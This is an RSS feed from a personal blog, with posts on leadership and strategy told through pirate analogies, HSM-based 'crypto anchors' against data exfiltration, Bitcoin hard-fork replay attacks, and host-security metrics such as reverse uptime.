<?xml version="1.0" encoding="UTF-8"?><rss xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" version="2.0" xmlns:media="http://search.yahoo.com/mrss/"><channel><title><![CDATA[Diogo Mónica]]></title><description><![CDATA[Founder of Anchorage Digital, previously led security at Square and Docker. CEO. PhD in Computer Science. Angel investor]]></description><link>https://blog.diogomonica.com/</link><generator>Ghost 5.59</generator><lastBuildDate>Fri, 10 Oct 2025 05:08:49 GMT</lastBuildDate><atom:link href="https://blog.diogomonica.com/rss/" rel="self" type="application/rss+xml"/><ttl>60</ttl><item><title><![CDATA[A Pirate's take on Command vs. Leadership]]></title><description><![CDATA[Tired of being told that you should be a leader? Do not worry. Pirate captains had great leadership skills, and they were still beaten to oblivion by Navy Captains who exercised pure command on their ships.]]></description><link>https://blog.diogomonica.com/2019/02/18/a-pirates-take-on-command-vs-leadership/</link><guid isPermaLink="false">62d8ce7b47f91800018f06e3</guid><category><![CDATA[business]]></category><category><![CDATA[pirates]]></category><category><![CDATA[leadership]]></category><dc:creator><![CDATA[Diogo Monica]]></dc:creator><pubDate>Mon, 18 Feb 2019 06:00:00 GMT</pubDate><content:encoded><![CDATA[<p><em>Tired of being told that you should be a leader? Do not worry. Pirate captains had great leadership skills, and they were still beaten to oblivion by Navy Captains who exercised pure command on their ships. Is then leadership less effective than command? Keep reading. I have all the answers. Or so my mother tells me.</em></p><!--kg-card-begin: html--><figure class="kg-card kg-image-card">
  <img src="https://blog.diogomonica.com/content/images/2019/02/01-abandoned-leader---Small.jpg" width="550">
  <figcaption>Leadership-based approaches are not necessarily more effective than pure command.</figcaption>
</figure><!--kg-card-end: html--><h2 id="the-problem">The Problem</h2><p>If you were ever at the head of a team, you probably wondered how you were performing. Were you <em>commanding</em> your team, or was it pure <em>leadership</em>? You probably even tried to read a book on the topic, but instead of the promised enlightenment, you ended up exactly where you started. You saw lists of qualities defining a <em>leader</em>, but both your soul and intellect kept screaming the obvious: should not any good <em>commander</em> possess those qualities too? So, what is the difference?</p><p>Do not fret. Your soul and intellect were right all along. Whatever qualities those books say a <em>leader</em> should possess, those are qualities that any <em>commander</em> should identically possess (incompetent commanders excluded, of course). Any framework using the model &#x201C;Leaders do &#x2018;A,&#x2019; while commanders do &#x2018;B,&#x2019;&#x201D; is wrong. If they are any good, both leaders and commanders will do the exact same things: the right ones. What distinguishes <em>leadership</em> from <em>command</em> is not what you do; it is how and why it becomes done. Furthermore, neither way is better than the other. Both may work or fail in different contexts and at different times. There are times for leadership, and there are times for command. In fact, most of us exercise both simultaneously, and we do not even get to choose which one we are using. Let me explain.</p><h2 id="pirate-ships-the-rule-of-democracy-and-leadership">Pirate ships: The rule of democracy and leadership</h2><p></p><p>Discussing the core nature of the pirate code would take us too far. Suffice it to say that pirate ships of old constituted very democratic universes. Captains (and other officials) were elected, could be deposed at any time, and had very limited powers when not in battle. The crew had the authority to determine where to go and what to plunder. If a Captain had a particular idea or plan that he wanted to pursue, he would have to convince the crew to follow his reasoning, believe in what he believed, and thus do what he wanted them to do. This required leadership.</p><blockquote><em>Leadership:</em> The ability to have people follow you, your plan, vision, or intended course of action, not because they are supposed to obey you, but because they believe and voluntarily adhere to the said vision, plan, or course of action.</blockquote><!--kg-card-begin: html--><figure class="kg-card kg-image-card">
  <img src="https://blog.diogomonica.com/content/images/2019/02/02-turtle-pirate---Small.jpg" width="550">
  <figcaption>Pirate ships. The rule of democracy and leadership.</figcaption>
</figure><!--kg-card-end: html--><h2 id="navy-ships-the-rule-of-pre-defined-order-and-command-">Navy ships. The rule of pre-defined order and command.</h2><p>Navy ships, in contrast, even when deployed to defend democracy, were never meant to exercise it. Any crew member with loud dreams of on-board voting ballots, freedom of speech, or free-will, would probably be flogged, keeled, or hanged, depending on the epoch, the ship, and the Captain&apos;s particular implementation of the Articles-of-War. When the Captain of a man-of-war made a decision, he would issue a command and people would do his bidding, because that is what they were supposed to do. The Captain commands and the crew obeys, because it is written so; because that is how their world is organized.</p><blockquote><em>Command:</em> The act of determining what other people will do, using the hierarchical or functional dependencies established in your mutual organization or context, which determine that your decisions are to be obeyed.</blockquote><!--kg-card-begin: html--><figure class="kg-card kg-image-card">
  <img src="https://blog.diogomonica.com/content/images/2019/02/03-job-list-new---Small.jpg" width="550">
  <figcaption>Navy ships. The rule of pre-defined order and command.</figcaption>
</figure><!--kg-card-end: html--><h2 id="the-world-at-large-the-rule-of-mix-and-proportion">The world at large. The rule of mix and proportion</h2><p>Let us suppose that you are chairing a meeting with your trusty employees, in which you will present the strategy that will make your enterprise survive and prosper in the next decade. You present your ideas, and because you are a knowledgeable person, passionate about your ideas, and have a good grasp on how to handle the challenges facing your company, seven of the ten people in the room become totally convinced and adhere to your vision and approach. The remaining three have doubts concerning the efficacy of your proposals, and are not fully convinced; despite that, they will do as asked, because you are the boss, and implementing your decisions is what they have been hired to do. This means that when the thing gets done, 7/10 of it will have been done through leadership, and 3/10 will have been done by command. But who&#x2019;s counting, right? You never know the score when you end a meeting.</p><p>It does not really matter why things get done, as long as the right things get done, and in a manner in which everyone feels respected and adequately valorized. There is no magic about leadership, and there is no magic about command. Be a leader or be a commander; be who you are. Sometimes, you will find that leadership will not work and things must be done by command; other times, you will find that simply issuing commands will not be effective, and that you need to go the extra mile and really convince people, getting them to adhere and believe in your vision and ideas. Be who you are, and proceed as required. Just be efficient, thoughtful, and considerate in whatever you do.</p>]]></content:encoded></item><item><title><![CDATA[A Pirate's take on Strategy vs. Tactics]]></title><description><![CDATA[Strategy vs.Tactics is one of the most written-about topics in business, but most business books seem to explain it in ways that hinder both the clarity of thought and the establishment of good conceptual frameworks.]]></description><link>https://blog.diogomonica.com/2018/10/07/a-pirates-take-on-strategy-vs-tactics/</link><guid isPermaLink="false">62d8ce7b47f91800018f06e2</guid><category><![CDATA[business]]></category><dc:creator><![CDATA[Diogo Monica]]></dc:creator><pubDate>Sun, 07 Oct 2018 16:20:25 GMT</pubDate><content:encoded><![CDATA[<p>Strategy vs. Tactics is one of the most written-about topics in business, but most business books seem to explain it in ways that hinder both the clarity of thought and the establishment of good conceptual frameworks.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://blog.diogomonica.com/content/images/2018/10/Screenshot-2018-10-06-at-13.59.58.png" class="kg-image" alt loading="lazy"><figcaption>A Pirate&apos;s take on Strategy vs Tactics</figcaption></figure><p>Are strategy and tactics really different concepts, or just different levels of the same thing? If different, in what do they differ? Should they be handled differently? The goal of this blog-post is to describe strategy and tactics from the point of view of the Captain of a pirate ship, in the hope that the analogy will be sticky enough to allow remembering the concepts the next time this topic comes up. Let us first set up the context, and then clarify the concepts.</p><h2 id="a-pirate-s-conundrum">A Pirate&#x2019;s conundrum</h2><p>In March 1699, after a years-long voyage as a privateer, Captain Kidd found himself in the Caribbean commanding a captured, undermanned, treasure-laden vessel (the Quedagh Merchant). There, he learned that he and his crew had been declared pirates and were to be arrested. The accusation of piracy stemmed from having captured two ships (the Quedagh being one of them), which led to an immense diplomatic and political upheaval. However, Kidd had in his possession the French passes presented to him by those ships, which made the captures legal (at least technically), and thus constituted his proof of innocence against the piracy accusations.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://blog.diogomonica.com/content/images/2018/10/william-kidd.jpg" class="kg-image" alt loading="lazy"><figcaption>Captain William Kidd</figcaption></figure><p>The situation was dire. The English, Dutch, and Portuguese navies would capture or destroy him on sight. If he was captured, he was likely to be sacrificed without a fair trial. Everybody wanted a piece of him. </p><h2 id="the-strategy">The strategy</h2><p>This is the type of situation where one can certainly use a well-designed strategy. Here is the set of strategic objectives (and their interrelations) that Kidd seems to have adopted; that is, his strategic map:</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://blog.diogomonica.com/content/images/2018/10/image-1.png" class="kg-image" alt loading="lazy"><figcaption><strong>Captain Kidd&#x2019;s Strategic map</strong></figcaption></figure><p>The chosen strategy seems sensible. If he were to prove his innocence from the piracy accusations, he had to ensure that the French passes (the only documents capable of doing so) were safely delivered to the proper authorities. Furthermore, proving his innocence would require the goodwill of powerful allies, the most obvious of which were the powerful financial backers of his privateering adventure. Not only was Lord Bellomont one of these backers, he was the Governor of New York. All in all, this made him the best possible ally and entry point into the system to prove Kidd&#x2019;s innocence, given that proving the legality of Kidd&#x2019;s captures would have entitled him to his share of the expedition profits. Delivering the passes and treasure to Bellomont was, therefore, the sensible thing to do. To reach Bellomont, however, Kidd needed to navigate to New York undetected, lest he be captured underway. This implied obtaining a new ship, because the moorish-built Quedagh was big and highly conspicuous. Overall, his was a sound strategy.</p><h2 id="the-outcome">The outcome</h2><p>Captain Kidd did reach the lower three objectives defined in his strategy. He managed to buy a new ship, transfer a considerable part of the treasure to it, and then navigate to New York undetected (the Quedagh was left behind with the remainder of the treasure), finally reaching Lord Bellomont with the passes and part of the treasure. His undoing was in how he did these things (his tactics), which in the end made it impossible for him to reach the remaining defined strategic objectives and, ultimately, led to his untimely death.</p><figure class="kg-card kg-image-card"><img src="https://blog.diogomonica.com/content/images/2018/10/image--1--1.png" class="kg-image" alt loading="lazy"></figure><p>Overall, his tactics to reach the strategic objective &#x201C;Ensure the goodwill of my financial backers&#x201D; were very thin. They relied solely on convincing Bellomont, who would then influence the remaining backers and the central powers. If Bellomont reported that the passes were valid, the piracy charges were unfounded, and Kidd had willingly and honestly performed his assigned commission, then the remaining backers would certainly have been won to Kidd&#x2019;s cause, for self-interest if nothing more. His tactics thus had a single point of failure (convincing Bellomont), and one whose probability of failure was unknown. It was a very thin piece of tactics, and it failed miserably.</p><p> Lord Bellomont quickly came to consider Kidd as a hostile, lying, and deceiving rascal, and not only imprisoned him, but did his best to portray Kidd in the worst possible light to the central powers in London. In fact, he even came up with a backup plan to hang Kidd if the piracy charges happened to be waived.</p><p>Having failed to reach that particular strategic objective, the remaining objectives fell like a house of cards. Kidd found himself without allies, with not a single relevant person interested is sustaining his innocence, and with an increased number of powerful people committed to his demise. The end was unavoidable. He could not prove his innocence; the French passes disappeared (they have been found in the early twentieth century), false testimonies were given, favorable facts and testimonies were disregarded, etc. In the end, he was sentenced to die on the gallows. A possibly honest but by then powerless man, completely isolated except for his unfaltering (but also powerless) wife was left to fend unscrupulous powerful enemies, and a biased judicial system that was out to get him. It was not even a fight; it was a massacre.</p><p>If something important is to to be taken out of this sordid affair, it&apos;s this:</p><blockquote><strong>Strategy is important, but not more important than the tactics that &#xA0;support it.</strong></blockquote><hr><h2 id="defining-and-clarifying">Defining and clarifying</h2><p>Let us now distinguish strategy from tactics. One of the most concise definitions of these concepts was proposed by Carl von Clausewitz, (still) one of the most respected military theorists of all times. In a free translation, &#x201C;Tactics is the use of armed forces to win battles; strategy is the use of battles to win the war.&#x201D; Unfortunately, the conciseness and underlying military context of this definition make it easy to miss the real point, which often leads to confusion, especially when extrapolating these concepts to non-military contexts involving organizations, markets, and competition.</p><p>The real point is this: In war, we can find relatively well defined periods of intense activity and decisive action (to avoid the restriction to military actions&#x2014;battles&#x2014;we will simply call these periods actions), followed by periods of calm (or preparations for the next action). Each action results in a new end-state, which contributes to a new overall balance between the conflicting foes.</p><figure class="kg-card kg-image-card"><img src="https://blog.diogomonica.com/content/images/2018/10/Screenshot-2018-10-06-at-20.00.07.png" class="kg-image" alt loading="lazy"></figure><p>Even though simplified (in real life, not all actions are sequential and, therefore, the several possible action/end-state pairs tend to create a more or less complex mesh), this view gives us all we need to define strategy and tactics.</p><blockquote><strong>Strategy</strong> is the choice of an appropriate set of end-states that will hopefully lead to the desired final outcome. (defining <strong>WHAT</strong> to accomplish)</blockquote><blockquote><strong>Tactics</strong> is the choice of the best actions (and how to best implement them) to achieve the defined end-states. (defining <strong>HOW</strong> to do it)</blockquote><p>The end-states defined in our strategy are our strategic objectives. The actions required to reach them will from now on be called tactical actions, for clarity. When we decide that we want to reach a particular end-state (having a new ship, reaching New York, leaving writing blog posts to someone who knows how to do it, or whatnot), we are defining the strategy, establishing a strategic objective; when we start discussing how to reach that end-state, we are discussing tactics, designing a tactical action.</p><p>Some tactical actions may be highly complex and/or dilated in time. As such, they may have their own internal end-states. That is to say that, even when designing a tactical action, one may also very well need to make strategic decisions (choose end-states), albeit limited to the scope of that tactical action. To successfully change ships in the Caribbean, some type of strategy was certainly followed, because finding a locally available adequate ship and reaching an acceptable solution for the Quedagh and the treasure must have been a messy and complicated business. However, from the point of view of Kidd&#x2019;s greater strategy, the details or decisions made in this process are &#x201C;simply&#x201D; the inner workings of the tactical action required to achieve the strategic objective &quot;Obtain a new ship&quot;. The strategic objectives of the crew members tasked with obtaining the new ship may, from the higher-level point of view of Kidd&#x2019;s global strategy, be considered tactical objectives. In fact, it frequently happens that the very same decisions may be correctly considered tactical or strategic depending solely on the point of view.</p><p>Let us pretend that Kidd assigned the acquisition of a new ship to his first mate. The strategies and tactics might then have been, from Kidd&#x2019;s and his first mate&#x2019;s points of view, the following:</p><figure class="kg-card kg-image-card"><img src="https://blog.diogomonica.com/content/images/2018/10/strategy-table-1.png" class="kg-image" alt loading="lazy"></figure><p>As shown, to accomplish the assigned mission the first mate had to design his own strategy, with clear end-states (strategic objectives) and associated tactics. But from Kidd&#x2019;s point of view the first mate&#x2019;s strategic objectives are simply details associated with his chosen tactical action. An objective such as &#x201C;Trick Mr. X into selling his ship&#x201D; is a strategic objective for the first mate, but would be considered (at most) a tactical objective by Kidd, because it is simply an inner component of his chosen tactics.</p><p>Whenever things get murky (and they truly can), the fallback is simple: if we are defining a set of end-states leading to the desired outcome, we are designing a strategy; if we are discussing how to better reach those end-states, we are discussing tactics. Be it at whatever level it may be.</p>]]></content:encoded></item><item><title><![CDATA[Crypto Anchors: Exfiltration Resistant Infrastructure]]></title><description><![CDATA[We need to start architecting our data-flows in a way that makes it harder for attackers to continue exfiltrating sensitive data our of our infrastructures
]]></description><link>https://blog.diogomonica.com/2017/10/08/crypto-anchors-exfiltration-resistant-infrastructure/</link><guid isPermaLink="false">62d8ce7b47f91800018f06e1</guid><category><![CDATA[crypto-anchors]]></category><category><![CDATA[infosec]]></category><dc:creator><![CDATA[Diogo Monica]]></dc:creator><pubDate>Sun, 08 Oct 2017 22:31:47 GMT</pubDate><content:encoded><![CDATA[<!--kg-card-begin: markdown--><p>I&apos;ve been thinking about a concept that <a href="https://twitter.com/nathanmccauley?ref=blog.diogomonica.com">Nathan McCauley</a> and I came up with a few years ago: <a href="https://www.youtube.com/watch?v=lrGbK6fE7bI&amp;ref=blog.diogomonica.com">crypto-anchoring</a>&#x2014;and how much impact this kind of architectural decision could have in the breaches that we&apos;ve been <a href="http://fortune.com/2017/10/02/equifax-credit-breach-total/?ref=blog.diogomonica.com">experiencing lately</a>.</p>
<img src="https://blog.diogomonica.com/content/images/2017/10/crypto-anchor.png" width="130">
<p>It turns out that the vast majority of data breaches follow a pattern like this:</p>
<ul>
<li>An attacker hacks into company X&apos;s infrastructure.</li>
<li>The attacker exfiltrates sensitive content (hashed passwords, etc.).</li>
<li>The attacker has fun with the data at home (password cracking, etc.).</li>
</ul>
<p>And even though there are thousands of different security products focused on detecting each step of the <a href="http://www.techrepublic.com/article/cybersecurity-understanding-the-attack-kill-chain-and-adversary-ecosystem/?ref=blog.diogomonica.com">attacker killchain</a>, it&apos;s time that we start architecting our applications&#x2014;and data-flows&#x2014;in a way that makes it harder for attackers to continue following the same script.</p>
<h2 id="canonicalattack">Canonical Attack</h2>
<p>Take the simplified example of a <a href="https://latesthackingnews.com/2016/12/15/1-billion-accounts-leaked-yahoos-database/?ref=blog.diogomonica.com">data-exfiltration attack</a> depicted below:</p>
<img src="https://blog.diogomonica.com/content/images/2017/10/common-database-exfil-1.png" width="500" alt="Canonical database leak attack.">
<p>In this particular example, an attacker accesses and exfiltrates the contents of the user database containing all of the user information, including the password hashes used for authentication to the service. The attacker is now free to crack these passwords anywhere, and if the attack and exfiltration of the database aren&apos;t immediately detected, you might never know what happened until the cracked passwords start being sold on the black market.</p>
<h2 id="slowingattackersdown">Slowing attackers down</h2>
<p>What if we could architect our systems such that the attacker can&apos;t use the stolen data outside of our infrastructure? Doing that would give us the following advantages:</p>
<ul>
<li>More chances for detection of the attackers, since they have to operate within our environment.</li>
<li>Logs that show precisely what pieces of data have been accessed, allowing us to assess the impact an attack more accurately.</li>
<li>Force the attacker work in an adversarial environment, slowing down their progression by rate-limiting services that allow access to sensitive data.</li>
</ul>
<p>By forcing the attacker to have to operate within our infrastructure, we are making them operate like a <strong>bull in a china-shop</strong>.</p>
<img src="https://blog.diogomonica.com/content/images/2017/10/bull-in-china-shop-1.jpg" width="300">
<h2 id="keepingattackersin">Keeping attackers in</h2>
<p>Let&apos;s look again at the example of our canonical database leak. If we want to force an attacker not to be able to crack a password offline, we have to make the computation of the password hash dependent on something that can&apos;t leave the data center. Maybe a key generated inside of a piece of hardware physically bolted onto your servers?</p>
<p>It turns out those already exist, and are called <a href="https://en.wikipedia.org/wiki/Hardware_security_module?ref=blog.diogomonica.com">HSMs</a> (Hardware Security Modules). You can buy your own HSMs if you&#x2019;re running your own datacenter, or use the ones available in various <a href="https://azure.microsoft.com/en-us/services/key-vault/?ref=blog.diogomonica.com">cloud providers</a>.</p>
<p>Let&apos;s take the same attack as before, but instead of simply hashing the password (<code>H(password)</code>) we first apply an operation using a key generated inside of our HSM (<code>HMAC(key, password</code>). Adding this extra step makes the contents of the database the attacker exfiltrates contain hashes of passwords that can&apos;t be re-computed without the ability to query the HSM.</p>
<img src="https://blog.diogomonica.com/content/images/2017/10/anchored-database-exfil-1.png" width="500" alt="Crypto-anchored User Password Access.">
<p>That brings us to the concept of a crypto-anchor:</p>
<blockquote>
<p>A Crypto-anchor is a service that forces a data-flow to only be available within the boundaries of your infrastructure.</p>
</blockquote>
<p>Let&apos;s take a look at a couple more examples of using crypto-anchors:</p>
<p><strong>Data-flow</strong>: You have a credit-card processing service that needs the ability to temporarily persist and later decrypt end-to-end encrypted credit-card data coming from a remote hardware device.</p>
<p><strong>No Crypto-Anchor</strong></p>
<p>The most straightforward way of implementing this data-flow is by giving the payments service access to the private-key that decrypts the transaction information coming from the remote credit-card reader. This has the obvious downside that an attacker that compromises the payments service can exfiltrate both the encrypted transactions <em>and</em> the private-key that is necessary to decrypt them.</p>
<img src="https://blog.diogomonica.com/content/images/2017/10/searle-no-hsm-1.png" width="500">
<p><strong>With Crypto-Anchor</strong></p>
<p>If instead we crypto-anchor this data-flow, we disallow the attacker from decrypting any of these transactions outside of our infrastructure.</p>
<p>The easiest way of doing this is to have the private key necessary for decryption stored inside an HSM, exposed behind a decryption service with strict per-service rate-limiting on the number of allowed decryptions.</p>
<img src="https://blog.diogomonica.com/content/images/2017/10/searle-hsm-1.png" width="500">
<p><strong>Data-flow</strong>: You need a tokenization system that creates a stable identifier corresponding to a specific piece of sensitive data, say a user&apos;s Social Security Number<sup class="footnote-ref"><a href="#fn1" id="fnref1">[1]</a></sup>.</p>
<p><strong>No Crypto-Anchor</strong></p>
<p>The obvious way to implement a tokenization service is to generate a random token and store a mapping of that token and a one-way hash of the sensitive piece of data.</p>
<p>Unfortunately, the maximum number of possible SSNs is just under 1 billion, making it trivial for an attacker that downloads the database to brute-force them offline.</p>
<img src="https://blog.diogomonica.com/content/images/2017/10/fidelius-2.png" width="500">
<p><strong>With Crypto-Anchor</strong></p>
<p>Similarly to the previous example, if you wanted to ensure the attacker couldn&apos;t brute-force the SSNs offline, you could add a crypto-anchor in the data-flow, turning the offline brute-force attack into an online attack.</p>
<p>The easiest way to accomplish this is to have the token generation process be a keyed one-way function, that can only happen inside of an HSM.</p>
<img src="https://blog.diogomonica.com/content/images/2017/10/fidelius-with-tokenization-1.png" width="500">
<p>If we generalize the examples above, we can easily see that when we&apos;re architecting a system that deals with sensitive data, we should make sure to:</p>
<ul>
<li>Never expose a service that stores sensitive data directly to any internet-exposed (front-end) services.</li>
<li>Split core functionality into independent services, allowing for natural crypto-anchoring points in your data flow</li>
<li>Categorize services with different levels of security into different security zones, and rate-limit the number of API calls to the crypto-anchor on a per-zone or per-service basis.</li>
</ul>
<h2 id="conclusion">Conclusion</h2>
<p>By designing your applications in a way that ensures sensitive data-flows are crypto-anchored to your data center, you are:</p>
<ul>
<li>Slowing attackers down.</li>
<li>Gathering better information on what data was exposed.</li>
<li>Making attackers continuously risk detection by forcing them to operate on your turf.</li>
</ul>
<p>So go out there and anchor your data! &#x2693;&#xFE0F;</p>
<hr class="footnotes-sep">
<section class="footnotes">
<ol class="footnotes-list">
<li id="fn1" class="footnote-item"><p>Equifax anyone? <a href="#fnref1" class="footnote-backref">&#x21A9;&#xFE0E;</a></p>
</li>
</ol>
</section>
<!--kg-card-end: markdown-->]]></content:encoded></item><item><title><![CDATA[Bitcoin hard-forks and replay attacks]]></title><description><![CDATA[Given that the fork in November might not have replay protection, you'll have to ensure you protect yourself before you transact any BTC.
]]></description><link>https://blog.diogomonica.com/2017/09/25/what-to-do-before-a-blockchain-hard-fork/</link><guid isPermaLink="false">62d8ce7b47f91800018f06e0</guid><category><![CDATA[bitcoin]]></category><dc:creator><![CDATA[Diogo Monica]]></dc:creator><pubDate>Mon, 25 Sep 2017 15:42:16 GMT</pubDate><content:encoded><![CDATA[<!--kg-card-begin: markdown--><p>Dealing with blockchain hard-forks seems to have become an unfortunate and time-consuming reality of working in the cryptocurrency space these days: all the cool kids seem to be doing it.</p>
<img src="https://blog.diogomonica.com/content/images/2017/09/forking-the-hard-way.png" width="500" alt="Forking, the hard way.">
<p>With the looming possibility of <a href="https://bitcoinmagazine.com/articles/segwit2x-and-case-strong-replay-protection-and-why-its-controversial/?ref=blog.diogomonica.com">yet another Bitcoin hard-fork</a> come November, the rumor mill has started spitting out the much expected <a href="https://cointelegraph.com/news/november-segwit2x-hard-fork-could-see-newbie-users-lose-bitcoins?ref=blog.diogomonica.com">fear-mongering articles</a>.</p>
<p>Let me start by saying that if the hard-fork does happen, and your Bitcoin isn&apos;t stored in an exchange, <strong>no immediate action will be required from you</strong>. If you are currently hosting your Bitcoin is an exchange like Coinbase or Gemini, you are beholden to those companies to do the right thing when Bitcoin forks: allow you access to both currencies. It might not happen immediately; it might not happen at all.</p>
<p>If you have your Bitcoin in an offline wallet stored in a vault somewhere (as is recommended), and have no intentions of selling your newly cloned Bitcoin, then save this article for later.</p>
<p>The reason this is a no-op for any Bitcoin holders is the fact that the newly cloned blockchain is a copy of the old blockchain: anyone attempting to move your holdings will still need a valid signature from your private key. Inaction will not lead to loss of your holdings, period.</p>
<img src="https://blog.diogomonica.com/content/images/2017/09/fork4.png" alt="Bitcoin network before and after a hard-fork. No biggie.">
<p>However, given that the fork in November might not have replay protection, you&apos;ll have to ensure you protect yourself before you transact any Bitcoin.</p>
<h4 id="whatisareplayattack">What is a replay attack?</h4>
<p>It turns out that if you fork two very similar code-bases with no protocol modifications, any message intended for a node running the new codebase is also valid for a node running the old codebase. A replay attack happens when a malicious node in one of the chains intentionally sends messages it receives to the other chain.</p>
<img src="https://blog.diogomonica.com/content/images/2017/09/fork3.png" width="500" alt="Bitcoin network with a malicious attacker replaying messages on both chains.">
<p>That brings us to the quickest solution that guarantees you don&apos;t lose access to any of your holdings in either chain: after the fork happens, ensure that <strong>the first transaction you do is transferring all your holdings from your current wallet to another wallet under your control</strong>. Doing this will make sure that, even if an attacker relays your transaction to the other chain, you&apos;re the sole person in control of the corresponding destination wallet address, thus reducing the impact of the attack to a minor annoyance.</p>
<p>Here is the list of actions to take after the fork:</p>
<ol>
<li>Use your normal Bitcoin software<sup class="footnote-ref"><a href="#fn1" id="fnref1">[1]</a></sup> to generate a new wallet and save it offline.</li>
<li>Bring your current Bitcoin wallet online, and transfer all your current holdings into the new wallet.</li>
<li>Verify that your Bitcoin has actually been sent (at least six confirmations on the blockchain).</li>
<li>Download trusted software that supports the new fork<sup class="footnote-ref"><a href="#fn2" id="fnref2">[2]</a></sup>.</li>
<li>Generate a new wallet using the new software, and save it offline.</li>
<li>Import your old wallet keys into this new software wallet, and send all the Bitcoin to your newly generated offline wallet.</li>
<li>Verify that your new currency has made it to the new wallet.</li>
</ol>
<p>I hope this helps clear up some of the confusion around the hard-fork. Be safe out there.</p>
<hr class="footnotes-sep">
<section class="footnotes">
<ol class="footnotes-list">
<li id="fn1" class="footnote-item"><p>I recommend you using <a href="https://electrum.org/?ref=blog.diogomonica.com">Electrum</a> <a href="#fnref1" class="footnote-backref">&#x21A9;&#xFE0E;</a></p>
</li>
<li id="fn2" class="footnote-item"><p>There is unfortunately no software currently available for this. I&apos;ll keep you posted. <a href="#fnref2" class="footnote-backref">&#x21A9;&#xFE0E;</a></p>
</li>
</ol>
</section>
<!--kg-card-end: markdown-->]]></content:encoded></item><item><title><![CDATA[The two metrics that matter for host security]]></title><description><![CDATA[The rise of the two metrics that matter for host security: reverse uptime and golden image freshness.
]]></description><link>https://blog.diogomonica.com/2017/09/01/two-metrics-that-matter-for-host-security/</link><guid isPermaLink="false">62d8ce7b47f91800018f06df</guid><dc:creator><![CDATA[Diogo Monica]]></dc:creator><pubDate>Fri, 01 Sep 2017 01:34:08 GMT</pubDate><content:encoded><![CDATA[<!--kg-card-begin: markdown--><p><img src="https://blog.diogomonica.com/content/images/2017/08/usertimer.gif" alt="It&apos;s the final countdown." loading="lazy"></p>
<p>As companies move their infrastructures towards ephemeral microservices, there is an opportunity to rethink some of the security metrics typically used to track infrastructure risk, such as the number of currently unpatched vulnerabilities sorted by their criticality.</p>
<p>In the same way that the adoption of Continuous Integration and Continuous Delivery (CI/CD) allows faster development and patching of application vulnerabilities, it is time for organizations to realize that they should follow the same pattern around upgrading the Operating System their applications are running on.</p>
<p>Instead of having a JIRA queue&#x2014;with an ever-increasing number of tickets tracking the CVEs in the Linux Kernel&#x2014;we should instead start tracking reverse uptime and golden image freshness.</p>
<h2 id="thetwometricsthatmatterforhostsecurity">The two metrics that matter for host security <sup class="footnote-ref"><a href="#fn1" id="fnref1">[1]</a></sup></h2>
<p>The first metric I want to mention is <strong>reverse uptime</strong>, which is a catchy name for a straightforward concept:</p>
<blockquote>
<p>Instead of looking at the time a host has been online as a proxy indicator of stability, we instead look at it as a proxy indicator of risk.</p>
</blockquote>
<p>A company that tracks reverse uptime as a security metric will relentlessly focus on bringing down the average uptime by automatically reimaging whichever hosts have been online the longest, and therefore, lowering risk.</p>
<img src="https://blog.diogomonica.com/content/images/2017/08/Blog-Post-Drawings.png" width="500" alt="Re-image from golden image">
<p>Of course, re-imaging all hosts from an out-of-date image is not ideal. This brings us to our second metric, <strong>golden image freshness</strong>:</p>
<blockquote>
<p>The time elapsed since the last build of the canonical OS image used to bootstrap hosts.</p>
</blockquote>
<p>Here are the main reasons to track these two metrics:</p>
<ul>
<li>OS Drift is a common cause of downtime. Reimaging hosts reduces unexpected divergences in configuration.</li>
<li>It becomes significantly harder to backdoor or maintain persistence on compromised nodes, since it forces the attacker to go after components like the firmware.</li>
<li>Updating the kernel is no longer an issue, since updating the golden image ensures hosts will be upgraded within a time-bounded window.</li>
<li>The golden image is now the single point of control, making it easier to audit, scan, sign and verify what is running on the hosts.</li>
</ul>
<p>Continuously driving down both reverse uptime and golden image freshness will significantly reduce the risk posed by the most dangerous type of vulnerability there is: <strong>old-days</strong>.</p>
<h2 id="theriseofosrollingdeploys">The rise of OS rolling-deploys</h2>
<p>Of course, tracking reverse uptime is a lot easier if you have an infrastructure where you can do hitless OS rolling deploys. But that, dear reader, is precisely the point. Caring about reverse uptime will ensure that your IT organization will get to the point where your oldest host has been online for hours, not years.</p>
<img src="https://blog.diogomonica.com/content/images/2017/08/Screen-Shot-2017-08-30-at-3.15.06-PM.png" width="400" alt="Rolling deploy from golden image">
<p>The good news is that there are several projects out there that will make it easier to automate this process. Projects like <a href="https://www.terraform.io/?ref=blog.diogomonica.com">Terraform</a> and <a href="https://github.com/docker/infrakit?ref=blog.diogomonica.com">infraKit</a> allow you to safely and predictably change your production infrastructure. Projects like <a href="https://www.packer.io/?ref=blog.diogomonica.com">Packer</a> and <a href="https://github.com/linuxkit/linuxkit?ref=blog.diogomonica.com">linuxKit</a> allow you to rebuild your OS images continuously.</p>
<h2 id="conclusion">Conclusion</h2>
<p>With the rise in popularity of tools like <a href="https://github.com/linuxkit/linuxkit?ref=blog.diogomonica.com">linuxkit</a> for OS image building and <a href="https://github.com/docker/infrakit?ref=blog.diogomonica.com">infrakit</a> for automated infrastructure rolling-deploys, refreshing every host in your infrastructure on a regular basis is no longer a pipe-dream&#x2014;making reverse uptime and golden image freshness the two most important security metrics to track for host security.</p>
<p>Thanks to <a href="https://twitter.com/dinodaizovi?ref=blog.diogomonica.com">Dino Dai Zovi</a> for pushing me to put this down in writing and <a href="https://twitter.com/nathanmccauley?ref=blog.diogomonica.com">Nathan McCauley</a> for the review.</p>
<hr class="footnotes-sep">
<section class="footnotes">
<ol class="footnotes-list">
<li id="fn1" class="footnote-item"><p>Sorry for the clickbaity title :) <a href="#fnref1" class="footnote-backref">&#x21A9;&#xFE0E;</a></p>
</li>
</ol>
</section>
